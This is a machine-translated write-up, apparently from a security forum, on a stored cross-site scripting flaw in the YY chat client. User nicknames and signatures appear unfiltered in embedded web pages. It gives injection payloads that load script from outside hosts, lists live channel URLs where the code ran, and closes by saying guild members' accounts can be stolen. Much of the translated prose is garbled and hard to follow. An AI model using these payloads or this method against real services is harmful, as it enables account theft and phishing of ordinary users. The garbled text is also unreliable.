YY client defects cause storage-type XSS

Like qq, yy accounts have nicknames and signatures. Qq client and qq web seamless connection, so "> '> such code does not appear in the client, but can directly appear in the web xss. For details, see http://tmxk.org/thread-496-1-1.html. Yy made the same mistake. The nickname of yy is 20 bytes. It is difficult to construct and feasible code, but it has been tested and is not filtered. In extreme cases, xss can be used, such as <embed/src = // x.cn/x>, in this way, clickjacking and phishing are enough. There is no limit on the signature of yy. How can I directly run the Code <script/src = // tmxk.org/.js> </script> to make the Code appear on the web? 1. Let's test it in the channel. First, I decided that the yy channel is embedded with the web. This idea is common. Many clients use this idea and can view the web source code. Press ctrl + A to copy the current file. Open an online editor and press ctrl + C. In the source code mode of the editor, you can see the source code of the web copy. In this way, we can know the form of signature code on the web. 2. first, we tested the Forum and posted a post. We found that the Forum editor is rich-text, not textarea, so we can insert rich-text code. But because of the embedded web, I cannot capture packets, I found the web page of the Forum through the above method and found that fuwen had filtered out. This is the forum url, http://y.duowan.com/channel2/52399485/index 0x1. 2 we change the signature or nickname into code, repeat the same operation. The code is executed. This is the corresponding url, http://y.duowan.com/channel2/getDetail? ChannelId = 52399485 & bbsZoneId = wEkJNgE-SR4 & topicId = wEqk-d1-Pi7 http://y.duowan.com/channel2/getDetail? ChannelId = 52399485 & bbsZoneId = wEqixf -- ONF & topicId = wEqiyVZ-OOB this is the execution status in the yy Client

I guess this simple browser has a decisive interface for interacting with scripts, and I have no patience to look for it. 3. As long as the member is a member of the Guild, the member of the guild will be recruited. Stealing a purple horse is not a nightmare. Combined with games, music, and other functions, you can enjoy full advantage.